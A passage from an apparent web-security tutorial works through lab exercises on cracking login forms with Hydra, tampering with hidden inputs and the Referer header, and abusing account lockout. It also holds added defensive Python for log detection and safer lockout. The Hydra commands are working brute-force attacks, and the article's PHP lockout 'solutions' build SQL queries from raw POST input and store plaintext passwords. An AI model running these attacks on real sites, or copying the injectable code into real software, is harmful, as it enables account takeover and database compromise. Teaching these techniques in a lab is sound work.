<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Next, you specify the host to attack (localhost or 127.0.0.1) followed by http-get (request a directory/page), followed by the path to the particular directory or file you are trying to access (path excluding the host which is already given). It will most likely look something like this:</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
hydra.exe -L HD:/WebsiteHacking/FormCracking/usrnames.txt -P HD:/WebsiteHacking/FormCracking/passwords.txt localhost http-get /HTTPSecurity/</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/080814_1249_WebsiteHack1.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 10pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 1: the HTTPAuth seeking credentials. Get them!</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
To establish a simple HTTPAuth mechanism yourself, you create the password file by running htpasswd.exe from your Apache bin folder in the Command Prompt. You can move the user account list file to any directory you want and enable the mechanism by editing your .htaccess file:</div>
<pre class="brush: plain; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">AuthType Basic
AuthName "Admin Area"
AuthUserFile path\authorized.htpasswd
Require user …
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
You can select only particular users to be able to access the page, and you can set different username lists for different parts of the website, but this mechanism for protection remains basic. To test cracking the example from the files, change the path of AuthUserFile to the current location of the HTTPSecurity directory.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/080814_1249_WebsiteHack2.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Exercise 5: Breaking a POST login form</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The username and password lists are in the FormCracking folder. They have not been changed, but the correct login credentials are easy enough.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The following statement might work:</div>
<pre class="brush: plain; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">hydra -L path/FormCracking/usrnames.txt -P path/FormCracking/passwords.txt 127.0.0.1 http-post-form "/FormCracking/index.php:username=^USER^&passwd=^PASS^:Oops"
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/080814_1249_WebsiteHack3.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The difference between this statement and the one we used to crack the HTTPAuth mechanism is that here we include the parameters that the form sends to the server-side script, in this case username and passwd. Those are the “name” attributes of the relevant input tags that we want to test.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/080814_1249_WebsiteHack4.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 10pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 2: viewing the POST fields.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Another difference is that after the address we want to crack we include, separated by a colon ( : ), the text that appears when the login submission is incorrect. Basically, we are telling the program to repeat until it gets a different output. In our case, “Oops” is part of the login error string we receive.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
We also include ^USER^ and ^PASS^ after each POST field that must be filled with the data from the username and password lists by the program.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Then, we wait and the job is done.</div>
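From the defender's side, the two Hydra runs above (Basic auth via http-get, then the POST form) leave a distinctive trail in the web server's access log. The following added Python example, not part of the article, runs a sliding-window count over constructed Apache combined-format lines; the IPs, timestamps, thresholds, login path list and User-Agent value are all constructed for the demo.

```python
"""Added example (not the article's code): detection logic a defender could run
over Apache combined-format access logs to spot the kind of credential guessing
the two Hydra exercises above produce.  Log lines, IPs, thresholds and the login
path list are constructed for the demo."""
import re
from collections import defaultdict, deque
from datetime import datetime

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATHS = {"/FormCracking/index.php"}   # POST login endpoints to watch
WINDOW_SECONDS = 60
THRESHOLD = 5


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def is_auth_attempt(rec):
    """A 401 is a failed (or missing) Basic-auth credential, the http-get case;
    a POST to a login form counts as one guess whatever the status, because the
    form answers 200 with 'Oops' in the body on failure."""
    return rec["status"] == 401 or (
        rec["method"] == "POST" and rec["path"] in LOGIN_PATHS
    )


def detect_bruteforce(lines, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Sliding-window count of auth attempts per (ip, path); returns the peak
    count for every pair that reached the threshold within the window."""
    recent = defaultdict(deque)
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_auth_attempt(rec):
            continue
        key = (rec["ip"], rec["path"])
        q = recent[key]
        q.append(rec["ts"])
        while q and (rec["ts"] - q[0]).total_seconds() > window:
            q.popleft()
        if len(q) >= threshold:
            alerts[key] = max(alerts.get(key, 0), len(q))
    return alerts


def tool_user_agents(lines, marker="hydra"):
    """Secondary signal: off-the-shelf tools often name themselves in the
    User-Agent unless told otherwise.  Trivial to spoof, so never rely on it alone."""
    found = set()
    for line in lines:
        rec = parse_line(line)
        if rec and marker in rec["ua"].lower():
            found.add((rec["ip"], rec["ua"]))
    return found


def _line(ip, sec, method, path, status, ua="Mozilla/5.0"):
    """Build one constructed combined-format log line at second `sec`."""
    return (f'{ip} - - [07/Jan/2016:14:24:{sec:02d} +0530] '
            f'"{method} {path} HTTP/1.1" {status} 512 "-" "{ua}"')


TOOL_UA = "Mozilla/5.0 (Hydra)"   # constructed value for the demo
SAMPLE_LOG = (
    [_line("192.168.1.10", 0, "GET", "/index.php", 200)]
    # seven wrong Basic-auth guesses against /HTTPSecurity/, then a hit
    + [_line("10.0.0.5", s, "GET", "/HTTPSecurity/", 401, TOOL_UA) for s in range(1, 8)]
    + [_line("10.0.0.5", 8, "GET", "/HTTPSecurity/", 200, TOOL_UA)]
    # one legitimate user who mistyped once
    + [_line("192.168.1.10", 9, "GET", "/HTTPSecurity/", 401)]
    # six POST guesses against the login form, all answered 200 ("Oops")
    + [_line("10.0.0.5", s, "POST", "/FormCracking/index.php", 200, TOOL_UA)
       for s in range(10, 16)]
)


if __name__ == "__main__":
    for (ip, path), n in detect_bruteforce(SAMPLE_LOG).items():
        print(f"ALERT {ip} -> {path}: {n} attempts within {WINDOW_SECONDS}s")
    print(tool_user_agents(SAMPLE_LOG))
```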
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Exercise 6: Modifying Parameters</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The next exercise is in the folder ParameterTampering. Open ParameterTampering/login.php with your browser. Your task is to bypass authorization, i.e. log in with wrong credentials without viewing the server-side code, reach the members.php message, and access members2.php without the “Error!”. You do not have to crack the user details. For one of the methods you must see what logging in looks like: use john/123.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The first manner in which you can do this is by modifying an element in the page, the second involves a change in the URL.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The other task is to enter members2.php without the server echoing “Error”. To do this, you should tamper with the HTTP headers and add a Referer. I would recommend a plugin such as Tamper Data for Firefox or Request Maker for Chrome.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Answers:</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
1st possibility:</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/080814_1249_WebsiteHack5.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 10pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 3: modifying the values of hidden inputs.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
It might seem weird at first, but many sites actually have hidden inputs in which they store important data. An example is PayPal shopping carts on third-party websites where you can change fields such as name of the product directly by changing the value of a hidden input. There are some outdated shopping carts which still use price as a hidden input which means that if you don’t use their API and verify the amount that was paid to you through a server-side script – the user can easily pay as much as he wants for the product!</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/080814_1249_WebsiteHack6.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 10pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 4: an example of a shopping cart which sets the price of the item on the client-side.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/080814_1249_WebsiteHack7.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 10pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 5: changing the name of the product in stores using PayPal as a payment method can still do some harm.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
2nd possibility:</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Setting a loggedin value in a GET request; that is probably not something you would meet anywhere today, though.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
3rd possibility, members2.php:</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Install and start Tamper Data with alt+T when the page is opened. Add a new Header…</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/080814_1249_WebsiteHack8.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Name it Referer and give it the path to login.php as its value; it will then look as if you were redirected from login.php. There are developers who think HTTP_REFERER proves that the user is legitimate even though it is just a header sent with HTTP requests, and this is still a point of exploitation on some sites today.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Exercise 7: Exploiting Account Lockout</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
If you have a simple lockout mechanism like this (PHP/MySQL, AccountLockout1 folder):</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">// Connecting to the MySQL database
mysql_connect("localhost", "root", "") or die(mysql_error());
mysql_select_db("userdb") or die(mysql_error());
// Loading the user's row (for the stored password)
$info = mysql_fetch_array(mysql_query("SELECT * FROM users WHERE username = '" . $_POST['username'] . "'"));
// Loading the current number of attempts that the user has used
$attempts = mysql_fetch_array(mysql_query("SELECT attempts FROM users WHERE username = '" . $_POST['username'] . "'"))[0];
if ($_POST['pass'] == $info['password']) {
    // Correct credentials: the login logic itself is not part of this listing
}
// If the login credentials are incorrect – add 1 to the attempts variable
else if ($_POST['pass'] != $info['password']) {
    $attempts += 1;
    echo "This is your " . $attempts . " attempt!\n";
    // Stop the rest of the code from executing if the user has attempted to log in with incorrect details at least three times
    if ($attempts > 2) {
        die("&lt;h1&gt;This account is locked. Contact the administrator at sysadmin@samplesite.com&lt;/h1&gt;");
    }
    // Update the attempts column of the particular user in the database
    mysql_query("UPDATE users SET attempts=" . $attempts . " WHERE username = '" . $_POST['username'] . "'");
}
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
If we have such a login form, or we rely on a WordPress or Joomla plugin that behaves like this without being aware of it, then malicious people can block an account just by knowing the username. On many sites the username is readily available, for instance in comments on articles, on message boards, in social media likes, etc.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
A solution is to block only the offending IP address and to make the block last only for a limited duration.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
A sample solution that adds a duration to the account lockout in PHP/MySQL could look something like this:</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">//folder AccountLockout2
// SQL to create the users table (run it in MySQL)
CREATE TABLE users(
    ID MEDIUMINT NOT NULL AUTO_INCREMENT PRIMARY KEY,
    username VARCHAR( 60 ),
    password VARCHAR( 60 ),
    attempts TINYINT,   -- number of failed login attempts
    time TINYINT        -- hour of the day at which the lockout was set, or -1
);
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Adding a user to the database could look like:</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">$insert = "INSERT INTO users (username, password, attempts, time)
VALUES ('" . $_POST['username'] . "', '" . $_POST['pass'] . "', '0', '-1')"; // attempts = 0, time = -1 (no lockout set yet)
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
We use the number -1 to indicate that there is no lockout.<br style="box-sizing: border-box;" />Then we change the old code a bit:</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">if ($attempts > 2) {
    // If there is no lockout yet, create one and say when the account is going to be active again
    if ($info["time"] == "-1") {
        $expectedRelease = date("H") + 1;
        mysql_query("UPDATE users SET time=" . date("H") . " WHERE username = '" . $_POST['username'] . "'");
        die("&lt;h1&gt;This account is locked. Contact the administrator at sysadmin@samplesite.com"
            . ". It is going to be active at: " . $expectedRelease . " o'clock&lt;/h1&gt;");
    }
    // Otherwise, remove the lockout once the hour in which it was set has passed
    // (note: comparing hours of the day only works within a single calendar day)
    else if ($info["time"] != -1 && date("H") > intval($info["time"])) {
        mysql_query("UPDATE users SET time='-1' WHERE username = '" . $_POST['username'] . "'");
        $attempts = 0;
    }
    else {
        // The account is already locked out and the hour has not passed yet: just say it is locked and quit
        die("&lt;h1&gt;This account is locked. Contact the administrator at sysadmin@samplesite.com&lt;/h1&gt;");
    }
}
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This simple script will lock out the account after three failed attempts, for a varying period of time: until the clock hour in which the lockout was set has passed. It can be found in the AccLockoutDuration folder.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Better still is to ban the offending IP address and to implement a more robust version of the above script, which serves demonstrative purposes only.</div>
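As an added example (not from the article or its sample folders), the following Python models the hardened policy suggested above: failed logins are counted per client IP and username rather than per username alone, and the lock expires after one hour measured with absolute timestamps instead of the hour of the day. The class and function names, the sample user table and the IP addresses are all constructed for this example.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass, field

MAX_ATTEMPTS = 3          # the third failure triggers the lock, as in the article
LOCK_SECONDS = 60 * 60    # one hour, as in the article
NO_LOCK = -1.0            # the article's "-1 means no lockout" convention


@dataclass
class _Entry:
    failures: int = 0
    locked_until: float = NO_LOCK   # absolute Unix time, not an hour of the day


@dataclass
class LockoutPolicy:
    """Failed logins are keyed by (client IP, username): an attacker who merely
    knows a username cannot lock the real user out from a different address.
    (Users behind one NAT share a bucket, so pair this with per-account rate
    limiting rather than a hard per-account lock.)"""
    _entries: dict = field(default_factory=dict)

    @staticmethod
    def _key(ip: str, username: str) -> tuple:
        return (ip, username.lower())

    def is_locked(self, ip: str, username: str, now: float) -> bool:
        key = self._key(ip, username)
        entry = self._entries.get(key)
        if entry is None or entry.locked_until == NO_LOCK:
            return False
        if now >= entry.locked_until:
            del self._entries[key]        # lock expired: forget the old failures
            return False
        return True

    def record_failure(self, ip: str, username: str, now: float) -> float:
        """Count one failed login; return the seconds left on the lock (0 if none)."""
        key = self._key(ip, username)
        if self.is_locked(ip, username, now):
            return self._entries[key].locked_until - now
        entry = self._entries.setdefault(key, _Entry())
        entry.failures += 1
        if entry.failures >= MAX_ATTEMPTS:
            entry.locked_until = now + LOCK_SECONDS
            return float(LOCK_SECONDS)
        return 0.0

    def record_success(self, ip: str, username: str) -> None:
        self._entries.pop(self._key(ip, username), None)


def hash_password(password: str, salt: bytes) -> bytes:
    # Salted PBKDF2 instead of the plaintext password column used by the article's INSERT
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_user_table() -> dict:
    """Constructed sample data standing in for the article's MySQL users table."""
    salt = os.urandom(16)
    return {"alice": (salt, hash_password("correct horse", salt))}


def login(policy: LockoutPolicy, users: dict, ip: str, username: str,
          password: str, now: float) -> str:
    """Return 'locked', 'ok' or 'bad_credentials' for one login attempt."""
    if policy.is_locked(ip, username, now):
        return "locked"
    record = users.get(username)
    salt, stored = record if record else (b"\0" * 16, b"\0" * 32)
    candidate = hash_password(password, salt)   # hashed even for unknown users: same timing
    if record is not None and hmac.compare_digest(candidate, stored):
        policy.record_success(ip, username)
        return "ok"
    policy.record_failure(ip, username, now)
    return "bad_credentials"


def simulate() -> list:
    """Attacker at 203.0.113.5 hammers 'alice'; alice then logs in from 198.51.100.7."""
    policy, users = LockoutPolicy(), make_user_table()
    attacker, victim, t0 = "203.0.113.5", "198.51.100.7", 1_700_000_000.0
    results = [login(policy, users, attacker, "alice", f"guess{i}", t0 + i) for i in range(4)]
    results.append(login(policy, users, victim, "alice", "correct horse", t0 + 5))
    # The attacker's lock expires one hour after the third failure (set at t0 + 2)
    results.append(login(policy, users, attacker, "alice", "correct horse", t0 + LOCK_SECONDS + 3))
    return results


if __name__ == "__main__":
    print(simulate())   # ['bad_credentials', 'bad_credentials', 'bad_credentials', 'locked', 'ok', 'ok']
```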
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Exercise 8: yet to come…</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 13pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 17.3333px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Conclusion</span></span></div>
<div style="-webkit-text-stroke-width: 0px; border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 25.9px; margin: 0px 0px 1em; orphans: auto; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
We have barely scratched the surface of website hacking and web security, as this is a vast field. Yet I hope future articles will reveal more of it, because a leak of data can harm not only the reputation of your business, the trust of your clients and their well-being, but can also put you in front of serious legal proceedings.</div>
</div>
Format String Bug Exploitation (posted 2016-01-07 by Anonymous)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
